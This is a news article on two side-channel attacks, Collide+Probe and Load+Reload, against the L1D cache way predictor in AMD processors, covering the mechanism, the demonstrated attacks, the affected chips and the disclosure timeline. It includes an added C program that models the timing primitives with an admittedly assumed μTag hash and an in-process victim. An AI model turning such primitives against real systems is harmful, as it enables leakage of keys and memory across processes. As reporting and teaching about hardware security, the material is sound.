Two attacks on the cache way predictor in AMD processors

A team of researchers from Graz University of Technology (Austria), previously known for developing the MDS, NetSpectre, Throwhammer and ZombieLoad attack methods, studied hardware optimizations specific to AMD processors and developed two new side-channel attack methods that exploit data leakage from the L1 cache way predictor of AMD processors. The techniques can be used to weaken ASLR protection, recover keys from vulnerable AES implementations, and increase the effectiveness of Spectre attacks.

The problems were found in the implementation of the way predictor in the CPU's first-level data cache (L1D), which is used to predict which cache way holds a given memory address. The optimization used in AMD processors is based on checking μ-tags (μTag). A μTag is computed by applying a specific hash function to the virtual address. During operation, the way predictor uses the μTag to look up the cache way in a table. The μTag thus lets the processor restrict itself to accessing only one specific way instead of checking all of them, which reduces the CPU's power consumption.


While reverse engineering the way predictor implementation across generations of AMD processors released from 2011 to 2019, two new side-channel attack techniques were identified:

  • Collide+Probe - lets an attacker track memory accesses of processes running on the same logical CPU core. The idea is to use virtual addresses that collide in the hash function used to compute the μTag, and to observe those collisions in order to trace memory accesses. Unlike the Flush+Reload and Prime+Probe attacks used against Intel processors, Collide+Probe does not rely on shared memory and works without knowledge of physical addresses.
  • Load+Reload - allows memory accesses on the same physical CPU core to be determined with high precision. The method relies on the fact that a physical memory location can reside in the L1D cache only once. That is, accessing the same memory location through a different virtual address evicts the existing copy from the L1D cache, which makes the access observable. Although the attack requires shared memory, it does not flush cache lines, enabling stealthy attacks that do not evict data from the last-level cache.
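The program below is an added example, not code from the page or from the researchers, and models the three mechanisms just described: the μTag lookup (a hash of virtual-address bits selects the L1D way), the Collide+Probe primitive (find an attacker-owned line in the same set with the same μTag as the victim's line, then time reloads of it), and the Load+Reload primitive (map the same physical page at two virtual addresses and time reloads through one alias). Assumptions: `utag()` is an illustrative XOR fold of address bits, not the exact per-generation hash the researchers reverse engineered; the cache geometry (64-byte lines, 64 sets indexed by VA bits 6-11) is the usual L1D layout; the `rdtsc` timing is only meaningful on a real AMD core, and the "victim" is called in-process purely to keep the demo self-contained.

```c
/* Added example (not the page's or the researchers' code). ASSUMPTIONS: utag()
 * is an illustrative hash, not AMD's real one; 64-byte lines, 64 L1D sets. */
#define _DEFAULT_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <time.h>
#include <unistd.h>

#define LINE     64ULL
#define SET_MASK 0x3fULL                 /* 64 sets: VA bits 6..11 pick the set */

/* ASSUMED μTag hash: bit i = va[12+i] ^ va[27-i] (8-bit tag). The real
 * function XOR-folds virtual-address bits too, but with different pairs. */
static unsigned utag(uintptr_t va)
{
    unsigned t = 0;
    for (unsigned i = 0; i < 8; i++)
        t |= (unsigned)(((va >> (12 + i)) ^ (va >> (27 - i))) & 1) << i;
    return t;
}

static uintptr_t set_index(uintptr_t va) { return (va / LINE) & SET_MASK; }

/* Collide+Probe needs a *different* line in the same set with the same μTag. */
static int utag_collides(uintptr_t a, uintptr_t b)
{
    return (a / LINE) != (b / LINE) && set_index(a) == set_index(b)
           && utag(a) == utag(b);
}

/* Scan an attacker buffer for a line colliding with the victim address. With
 * the assumed hash every (set, μTag) pair occurs exactly once per aligned
 * 1 MiB, so a 2 MiB buffer always contains a collider. Returns 0 if none. */
static uintptr_t find_collider(uintptr_t buf, size_t len, uintptr_t victim)
{
    for (uintptr_t p = (buf + LINE - 1) & ~(LINE - 1); p + LINE <= buf + len; p += LINE)
        if (utag_collides(p, victim)) return p;
    return 0;
}

static inline uint64_t now(void)
{
#if defined(__x86_64__)
    unsigned lo, hi;
    __asm__ volatile("lfence\n\trdtsc\n\tlfence" : "=a"(lo), "=d"(hi) :: "memory");
    return ((uint64_t)hi << 32) | lo;
#else                                   /* fallback so the file builds anywhere */
    struct timespec ts; clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/* One probe round, shared by both attacks: touch our line, let the victim
 * run, re-time our line. Collide+Probe: a slow reload means the predictor was
 * retrained to the victim's colliding line. Load+Reload: a slow reload means
 * the victim touched the same physical line via its alias and evicted ours. */
static uint64_t probe_round(volatile uint8_t *ours, void (*victim)(void))
{
    (void)*ours;
    victim();
    uint64_t t0 = now();
    (void)*ours;
    return now() - t0;
}

static volatile uint8_t *g_victim_addr;          /* constructed in-process victim */
static void victim_touch(void) { (void)*g_victim_addr; }
static void victim_idle(void)  { }

static uint64_t median_round(volatile uint8_t *ours, void (*v)(void), int n)
{
    uint64_t *s = malloc((size_t)n * sizeof *s), r;
    for (int i = 0; i < n; i++) s[i] = probe_round(ours, v);
    for (int i = 1; i < n; i++)                  /* insertion sort, n is small */
        for (int j = i; j > 0 && s[j - 1] > s[j]; j--) { r = s[j]; s[j] = s[j - 1]; s[j - 1] = r; }
    r = s[n / 2]; free(s); return r;
}

int main(void)
{
    /* Collide+Probe: no shared memory, only a virtual address that collides. */
    size_t len = 2u << 20;
    uint8_t *att = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    uint8_t *vic = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (att == MAP_FAILED || vic == MAP_FAILED) return 1;
    att[0] = vic[0] = 1;
    uintptr_t c = find_collider((uintptr_t)att, len, (uintptr_t)vic);
    g_victim_addr = vic;
    printf("Collide+Probe  victim idle: %llu  victim touches: %llu cycles\n",
           (unsigned long long)median_round((uint8_t *)c, victim_idle, 200),
           (unsigned long long)median_round((uint8_t *)c, victim_touch, 200));

    /* Load+Reload: one physical page, two virtual addresses (shared mapping). */
    FILE *f = tmpfile();
    if (!f || ftruncate(fileno(f), 4096) != 0) return 1;
    uint8_t *a1 = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, fileno(f), 0);
    uint8_t *a2 = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, fileno(f), 0);
    if (a1 == MAP_FAILED || a2 == MAP_FAILED) return 1;
    a1[0] = 1;
    g_victim_addr = a2;                          /* victim uses the alias */
    printf("Load+Reload    victim idle: %llu  victim touches alias: %llu cycles\n",
           (unsigned long long)median_round(a1, victim_idle, 200),
           (unsigned long long)median_round(a1, victim_touch, 200));
    return 0;
}
```

On an affected AMD core the second number of each pair should be noticeably larger than the first; on other microarchitectures, or with the real μTag function differing from the assumed one, Collide+Probe shows no difference even though the search still finds a candidate, which is exactly why the researchers had to reverse engineer the hash per generation before the attack worked. Note that neither attack relies on `clflush` or on evicting lines from the last-level cache, which is what makes them hard to spot with LLC-based detection.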

Building on the Collide+Probe and Load+Reload techniques, the researchers demonstrated several side-channel attack scenarios:

  • Using the methods to build a covert channel between two processes, transferring data at up to 588 kB per second.
  • Using μTag collisions to reduce the entropy of ASLR variants and bypass kernel ASLR on a fully patched Linux system. ASLR entropy reduction was shown to be possible both from user-space applications, from JavaScript running in a sandbox, and from code running inside a guest VM.


  • Based on Collide+Probe, an attack was implemented that recovers the encryption key from a vulnerable (T-table based) AES implementation.
  • Using Collide+Probe as the data acquisition channel, a Spectre attack was able to extract private data from the kernel without relying on shared memory.

The vulnerability affects AMD processors based on the Bulldozer, Piledriver, Steamroller, Zen (Ryzen, Epyc), Zen+ and Zen 2 microarchitectures.
AMD was notified of the problem on August 23, 2019, but has so far not published an advisory with information on mitigating the vulnerability. According to the researchers, the problem could be addressed with a microcode update that exposes MSR bits for selectively disabling the way predictor, similar to what Intel did to allow disabling branch prediction mechanisms.


source: budenet.ru
